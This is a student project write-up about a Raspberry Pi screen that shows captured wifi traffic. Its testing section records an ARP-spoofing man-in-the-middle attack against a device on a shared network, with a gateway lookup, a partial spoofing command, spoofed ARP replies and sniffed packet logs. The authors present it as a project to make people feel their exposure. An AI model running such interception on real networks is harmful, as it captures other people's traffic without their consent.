bio photo

Email

Concept

Build a screen that captures wifi traffic and use it to draw attention to the disadvantaged.

Project Name

Kittens

Team

Jamal Combs & Osama Sehgol

Build

Raspberry Pi with Noob It was the first time for both of using a Raspberry Pi, and we used the Noob version.

####Wifi configuration

Setting up WiFi connection

Start by booting the Raspberry Pi, connected to a display and a keyboard. Open up the terminal and edit the network interfaces file:

$ sudo nano /etc/network/interfaces

This file contains all known network interfaces, it'll probably have a line or two in there already.

Change the first line (or add it if it's not there) to:

auto wlan0

Then at the bottom of the file, add these lines telling the Raspberry Pi to allow wlan as a network connection method and use the /etc/wpa_supplicant/wpa_supplicant.conf as your configuration file.

allow-hotplug wlan0
iface wlan0 inet dhcp
wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet dhcp
(ctrl-X, then type Y to quit and save)

The next step is to create this configuration file.

####Screen

Raspberry Pi LCD 7” screen

Testing

After configuration was complete, we began installing packages that sniff traffic.

We identified router (gateway) IP address,

route -n 

Ran commands that watched wlan0 (wifi) traffic

-i wlan0 -t ip_target ip_gateway

And began telling target device our device was the gateway

0:c:e7:11:46:d3 88:53:95:56:f:2e 0806 42: arp reply 172.22.6.1 is-at 0:c:e7:11:46:d3
0:c:e7:11:46:d3 0:0:5e:0:1:26 0806 42: arp reply 172.22.6.18 is-at 0:c:e7:11:46:d3
0:c:e7:11:46:d3 88:53:95:56:f:2e 0806 42: arp reply 172.22.6.1 is-at 0:c:e7:11:46:d3
0:c:e7:11:46:d3 0:0:5e:0:1:26 0806 42: arp reply 172.22.6.18 is-at 0:c:e7:11:46:d3
0:c:e7:11:46:d3 88:53:95:56:f:2e 0806 42: arp reply 172.22.6.1 is-at 0:c:e7:11:46:d3
0:c:e7:11:46:d3 0:0:5e:0:1:26 0806 42: arp reply 172.22.6.18 is-at 0:c:e7:11:46:d3

This enabled us to see arbitrary traffic on our target device,

03/16/16 22:11:36 udp 128-122-6-135.DYNAPOOL.NYU.EDU.5353 -> 224.0.0.251.5353 (pcanywhere)
-----------------
03/16/16 22:11:36 udp 128-122-6-135.DYNAPOOL.NYU.EDU.5353 -> 224.0.0.251.5353 (pcanywhere)
-----------------
03/16/16 22:11:36 udp 128-122-6-135.DYNAPOOL.NYU.EDU.5353 -> 224.0.0.251.5353 (pcanywhere)
-----------------
03/16/16 22:11:40 udp 128-122-6-135.DYNAPOOL.NYU.EDU.5353 -> 224.0.0.251.5353 (pcanywhere)
[
  JO6w#J`##Sr#]#####*j#Y#####"m j-��/*+)(*:��,�a`c�89768(��>����Mc��DFG01RSLMNT###_U]U@ORW]4"C_b숈#G��hjk##fgpq
-----------------
03/16/16 22:11:47 udp 128-122-6-135.DYNAPOOL.NYU.EDU.5353 -> 224.0.0.251.5353 (pcanywhere)
-----------------
03/16/16 22:11:47 udp 128-122-6-135.DYNAPOOL.NYU.EDU.5353 -> 224.0.0.251.5353 (pcanywhere)
-----------------
03/16/16 22:11:47 udp 128-122-6-135.DYNAPOOL.NYU.EDU.5353 -> 224.0.0.251.5353 (pcanywhere)
_touch-remote#_tcplocal
-----------------
03/16/16 22:11:47 udp 128-122-6-135.DYNAPOOL.NYU.EDU.5353 -> 224.0.0.251.5353 (pcanywhere)
Mi##\{#T#
3q
^###
#+j#Q#��##, ##5��%�yz{�!".11#��7����6#��??@9:[\EFGS
#@LFLGFY^R=)JX[ױ��*~��ccd##o`ijkw.�/�Y
-----------------
03/16/16 22:11:48 udp 128-122-6-135.DYNAPOOL.NYU.EDU.5353 -> 224.0.0.251.5353 (pcanywhere)
�Mi##\{#T#
3q
^###
#+j#Q#��##, ##5��%�yz{�!".11#��7����6#��??@9:[\EFGS
#@LFLGFY^R=)JX[ױ��*~��ccd##o`ijkw.�/�Y
-----------------
03/16/16 22:11:50 udp 128-122-6-135.DYNAPOOL.NYU.EDU.5353 -> 224.0.0.251.5353 (pcanywhere)
�Mi##\{#T#
3q
^###
#+j#Q#��##, ##5��%�yz{�!".11#��7����6#��??@9:[\EFGS
#@LFLGFY^R=)JX[ױ��*~��ccd##o`ijkw.�/�Y
-----------------
03/16/16 22:11:54 udp 128-122-6-135.DYNAPOOL.NYU.EDU.5353 -> 224.0.0.251.5353 (pcanywhere)
�Mi##\{#T#
3q
^###
#+j#Q#��##, ##5��%�yz{�!".11#��7����6#��??@9:[\EFGS
#@LFLGFY^R=)JX[ױ��*~��ccd##o`ijkw.�/�Y
-----------------
03/16/16 22:11:59 udp 128-122-6-135.DYNAPOOL.NYU.EDU.5353 -> 224.0.0.251.5353 (pcanywhere)
_touch-remote#_tcplocal
-----------------
03/16/16 22:14:07 udp 128-122-6-135.DYNAPOOL.NYU.EDU.5353 -> 224.0.0.251.5353 (pcanywhere)
_touch-remote#_tcplocal
-----------------
03/16/16 22:14:08 udp 128-122-6-135.DYNAPOOL.NYU.EDU.5353 -> 224.0.0.251.5353 (pcanywhere)
-----------------
03/16/16 22:14:08 udp 128-122-6-135.DYNAPOOL.NYU.EDU.5353 -> 224.0.0.251.5353 (pcanywhere)
_touch-remote#_tcplocal
-----------------
03/16/16 22:14:09 udp 128-122-6-135.DYNAPOOL.NYU.EDU.5353 -> 224.0.0.251.5353 (pcanywhere)
�Mi##\{#T#
3q
^###
#+j#Q#��##, ##5��%�yz{�!".11#��7����6#��??@9:[\EFGS
#@LFLGFY^R=)JX[ױ��*~��ccd##o`ijkw.�/�Y
-----------------
03/16/16 22:14:11 udp 128-122-6-135.DYNAPOOL.NYU.EDU.5353 -> 224.0.0.251.5353 (pcanywhere)
�Mi##\{#T#
3q
^###
#+j#Q#��##, ##5��%�yz{�!".11#��7����6#��??@9:[\EFGS
#@LFLGFY^R=)JX[ױ��*~��ccd##o`ijkw.�/�Y
-----------------
03/16/16 22:14:11 udp 128-122-6-135.DYNAPOOL.NYU.EDU.5353 -> 224.0.0.251.5353 (pcanywhere)

While the traffic was randomized and perhaps encrypted. The fact that it is possible to tap into was eye opening and made us feel exposed.

Why we did it

Both of us are passionate about using technology to lend a voice to the poor and disadvantaged.